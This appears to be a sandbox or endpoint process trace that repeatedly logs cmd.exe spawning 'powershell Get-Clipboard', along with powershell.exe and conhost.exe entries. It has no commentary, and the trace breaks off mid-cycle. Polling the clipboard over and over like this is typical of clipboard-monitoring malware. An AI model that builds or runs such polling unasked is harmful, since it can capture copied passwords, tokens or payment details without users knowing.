powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

